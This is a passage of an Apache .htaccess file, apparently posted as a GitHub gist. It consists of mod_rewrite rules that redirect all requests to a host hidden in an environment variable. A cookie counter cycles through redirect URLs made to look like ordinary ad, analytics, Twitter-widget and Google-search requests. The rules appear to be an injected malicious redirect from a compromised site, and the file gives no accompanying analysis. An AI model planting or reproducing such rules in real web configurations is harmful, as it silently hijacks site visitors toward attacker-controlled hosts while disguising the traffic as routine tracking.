RewriteRule ^.* http://%{ENV:iby}/delivery/lg.php?bannerid=34708&campaignid=4402&zoneid=1921&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=f9e364651b [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11722:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 33
RewriteRule ^.* http://%{ENV:iby}/b/ss/wmg,wmgatl,wmgd2cparamore,wmgparamoreall/1/H.20.3/s52573751583695?AQB=1&ndh=1&t=25/0/2010\%2010:57:52\%201\%20-60&vmt=4B7EBDA2&pageName=Paramore:Photos&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cc=USD&ch=Paramore:Photos&server=Paramore&events=event11&c1=Paramore&h1=Paramore\%7CPhotos&c2=Atlantic&v4=Paramore&c6=Atlantic:Fueled\%20By\%20Ramen&c9=4:30AM&c10=Monday&c11=Weekday&s=1440x900&c=24&j=1.6&v=Y&k=Y&bw=1440&bh=788&p=Shockwave\%20Flash\%3BDivX\%AE\%20Web\%20Player\%3BQuickTime\%20Plug-in\%207.2.0\%3BVLC\%20Multimedia\%20Plugin\%20\%28compatible\%20Totem\%202.26.1\%29\%3BWindows\%20Media\%20Player\%20Plug-in\%2010\%20\%28compatible\%3B\%20Totem\%29\%3B&pid=Paramore:Photos&pidt=1&oid=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ot=A&AQE=1 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10692:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 34
RewriteRule ^.* http://%{ENV:iby}/_xhr/ugccomments/?method=get_list&context_id=a0a135a0-a264-36ce-a1d3-afafddcada99&0.8972864237391045&mode=list&show_form=yes&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&&asset_title=Katy\%20Perry&ugccmt_vita_type=photo&ugccmt_vita_img_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ugccmt_vita_img_width=110&ugccmt_vita_img_height=88&ugccmt_vita_img_rights=anywhere&ugccmt_vita_photo_album=Memadukan\%20Gaun\%20dengan\%20Sepatu\%20Keds&ugccmt_vita_photo_album_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9799:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 35
RewriteRule ^.* http://%{ENV:iby}/url?sa=t&rct=j&q=robotics+indonesia&source=web&cd=2&ved=0CFkQFjAB&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ei=wpb-T9SMLYOurAfX7ZDfBg&usg=AFQjCNGg4X_LY4z6S24MHkAATNe_rlVm4A [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9638:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 36
RewriteRule ^.* http://%{ENV:iby}/t.gif?_=1340769192193&count=horizontal&hashtags=packaging&id=twitter-widget-14&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=The\%20Dieline\%20-\%20The\%20\%231\%20Package\%20Design\%20Website\%20-&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=thedieline&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9714:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 37
RewriteRule ^.* http://%{ENV:iby}/t.gif?_=1340152551183&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=Nonton\%20Soegija\%2C\%20Wapres:\%20Saya\%20Acungkan\%20Dua\%20Jempol!&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=detikcom&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1334627957284262969318907 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10188:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 38
RewriteRule ^.* http://%{ENV:iby}/b2?c1=2&c2=6299460&ns__t=1340620142222&ns_c=UTF-8&c8=Komik\%20Bleach\%20\%7C\%20Chapter\%20496\%20497\%20Hal\%202\%20-\%20Baca\%20Manga\%20Bahasa\%20Indonesia\%20Online&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10350:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 39
RewriteRule ^.* http://%{ENV:iby}/delivery/lg.php?bannerid=30552&campaignid=4402&zoneid=1853&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=8d4c3f609b [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9719:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 40
RewriteRule ^.* http://%{ENV:iby}/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CGUQFjAA&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ei=5yXsT82UBIXkrAeR09jLBQ&usg=AFQjCNGu8dRvgTMm0BjQlDT8_hp5u-Eg-A [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10003:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 41
RewriteRule ^.* http://%{ENV:iby}/lg.php?bannerid=195&campaignid=63&zoneid=2&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=b46f8d0301 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10717:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 42
RewriteRule ^.* http://%{ENV:iby}/__utm.gif?utmwv=5.3.3&utms=2&utmn=1025022492&utmhn=fashion-wanita.tokobagus.com&utmcs=UTF-8&utmsr=1024x768&utmvp=724x610&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=8.0\%20\%20r22&utmdt=KB\%20012\%20-\%20Kebaya\%20Sabrina\%20Lengan\%20Pendek\%20Ekor\%20Pinguin\%20-\%20Tokobagus.com&utmhid=1513261471&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/kebaya/kb-012-kebaya-sabrina-lengan-pendek-ekor-pinguin-9161208.html&utmac=UA-5908313-1&utmcc=__utma\%3D223717764.1421885339.1341198331.1341202029.1341219741.3\%3B\%2B__utmz\%3D223717764.1341219741.3.3.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dgrosir\%2520kebaya\%2520lengan\%2520pendek\%3B&utmu=qBIAAC~ [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9669:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 43
RewriteRule ^.* http://%{ENV:iby}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-15773&sessionID=1342515814792.41253&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/hyakujuu_kingdom/v01/c002/4.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.TtKA1ovQ&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/hyakujuu_kingdom/v01/c002/&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Hyakujuu\%20Kingdom\%202\%20-\%20Read\%20Hyakujuu\%20Kingdom\%20Chapter\%202\%20Online\%20-\%20Page\%204&ts1342515814794.0= [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10601:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 44
RewriteRule ^.* http://%{ENV:iby}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-3872&sessionID=1340284059900.22090&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/hanayomesama_wa_16_sai/v01/c004.5/6.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.brSRClLO&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/hanayomesama_wa_16_sai/v01/c004.5/5.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Hanayomesama\%20Wa\%2016-Sai\%204.5\%20-\%20Read\%20Hanayomesama\%20Wa\%2016-Sai\%20Chapter\%204.5\%20Online\%20-\%20Page\%206&ts1340284059902.0= [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10828:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 45
RewriteRule ^.* http://%{ENV:iby}/1pix.gif?dcsdat=1340339529671&dcssip=&os=Windows\%20XP&lang=en&flashVer=WIN\%2010\%2C1\%2C102\%2C64&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&playerURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&videoId=1414884282001&dcsuri=/viewer/video_view&sourceId=89804535001&publisherId=89804535001&affiliateId=&playerId=1522730664001&lineupId=1521712908001&playerTag= [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11151:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 46
RewriteRule ^.* http://%{ENV:iby}/fpc.pl?v=5.1.0.13.js&a=10001467053656&dpid=3675284404&ittidx=0&flv=Shockwave\%20Flash\%2010.0\%20r22&n=-7&g=en-US&h=N&j=1024x768&k=24&l=true&f=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=SPESIAL\%20Bursa\%20Transfer:\%20Pemain\%20Yang\%20Nilainya\%20Meningkat\%20Usai\%20Piala\%20Eropa\%20-\%20Yahoo!\%20Sports\%20Indonesia&enc=UTF-8&e=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&d=Tue\%2C\%2003\%20Jul\%202012\%2009:31:33\%20GMT [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11609:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 47
RewriteRule ^.* http://%{ENV:iby}/avatar/a64a2b34c3c66a043268a7b22d1af838?size=45&default=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9379:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 48
RewriteRule ^.* http://%{ENV:iby}/t.gif?_=1341795934217&count=horizontal&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=\%20Jangan\%20Ganggu\%20Dewi\%20Lestari&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=kompascom&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_dnt=1 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11919:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 49
RewriteRule ^.* http://%{ENV:iby}/t.gif?_=1340762166241&count=horizontal&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=DotA\%20Rank\%20NusaReborn&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=NusaReborn&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1340675878687145152256625 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9349:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 50
RewriteRule ^.* http://%{ENV:iby}/tracker?event=media_connect_error&source=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&domain=videocloud&time=1340271619656&platform=as3&playlist=1521712908001&flash_version=WIN\%2010\%2C1\%2C102\%2C64&embed=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&errorCode=FMSConnectionError&player_name=Direct\%20Lyrics\%20Sidebar\%20Playlist\%20Player(TEMP)&mediaURL=rtmp://brightcove.fcod.llnwd.net/a500/e1/uds/rtmp/ondemand/\%26mp4:89804535001/89804535001_1505158780001_acma02-alus-h264.mp4\%261340276400000\%26ad299d9af6b6740e14318597b99ec310&video_name=Top\%205\%20ACMA\%20Nominees\%202012&player=1522730664001&account=89804535001&video_duration=128&video=1505115769001 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9572:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 51
RewriteRule ^.* http://%{ENV:iby}/t.gif?_=1340265729568&count=none&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter_tweet_button_4&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=Foto\%20Gaya\%20Selebritas\%20Dengan\%20Sandal\%20Jepit\%20\%7C\%20Gambar\%20Gaya\%20Selebritas\%20Dengan\%20Sandal\%20Jepit\%20-\%20Yahoo!\%20She&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_dnt=1 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9300:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 52
RewriteRule ^.* http://%{ENV:iby}/imghover?iact=hm&ei=jUb-T8mnKorXrQeGmITWBg&q=zedonk&tbnh=90&tbnw=97&dur=1534&tbnid=YPVOhpDGsm8N2M:&hovh=194&hovw=259&vpx=244&vpy=260&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=0CGEQ3hEwAw&vetl=ms [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11600:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 53
RewriteRule ^.* http://%{ENV:iby}/__utm.gif?utmwv=5.3.3&utms=3&utmn=1300986120&utmhn=foto.detik.com&utmt=event&utme=14(1830)(1834)&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x629&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=detikFoto\%20Kedubes\%20Malaysia\%20Terus\%20Didemo\%20Gara-gara\%20Tor-tor&utmhid=1030357795&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/readfoto/2012/06/22/163137/1948534/157/1/kedubes-malaysia-terus-didemo-gara-gara-tor-tor&utmac=UA-891770-59&utmcc=__utma\%3D105061524.190573502.1332830229.1332833936.1341365650.3\%3B\%2B__utmz\%3D105061524.1341365650.3.2.utmcsr\%3Dnews.detik.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/read/2012/06/29/164315/1954227/10/kasus-pengeroyokan-anggota-fbr-ketua-pp-ranting-simpang-diburu-polisi\%3B&utmu=qhAAAAAgAAIAAAAAQ~ [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10237:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 54
RewriteRule ^.* http://%{ENV:iby}/delivery/lg.php?bannerid=4561&campaignid=1042&zoneid=57&loc=1&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=b3d61e2a7b [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10879:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 55
RewriteRule ^.* http://%{ENV:iby}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/for_the_sake_of_dulcinea/v01/c004/22.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10042:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 56
RewriteRule ^.* http://%{ENV:iby}/hb/i/sg/adv/infinity/sg_prom_ysm_iframe_20110425.html?ysm_rd=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_title1=Gunakan\%20YSM!&ysm_descr1=Berkembang\%20bersama\%20Yahoo!\%20Search\%20Marketing.&ysm_clickurl1=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_sitehost1=&ysm_pos=1&ord=1340252008291347 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9907:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 57
RewriteRule ^.* http://%{ENV:iby}/pview?event=pview&fpc=d96b1f4-13821567f33-22857197-193&sessionID=1340596542398.63549&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/magi/v06/c109/12.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.CxmN7WOe&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/magi/v06/c109/11.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Magi\%20109\%20-\%20Read\%20Magi\%20Chapter\%20109\%20Online\%20-\%20Page\%2012&ts1340596542402.0= [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:11504:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 58
RewriteRule ^.* http://%{ENV:iby}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/ane_mone_seikaten/v01/c001/10.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:9686:/:0:HttpOnly]
RewriteCond %{ENV:dEY} 59
RewriteRule ^.* http://%{ENV:iby}/openx/www/delivery/lg.php?bannerid=3640&campaignid=1353&zoneid=2714&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=5929b81d47 [R=302,NE,L,CO=dEY:%{ENV:dEY}:%{HTTP_HOST}:10360:/:0:HttpOnly]
</IfModule>
#87b8f3eda6b7fa73ab94943860f2044184735275d16502c2d625e59f
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment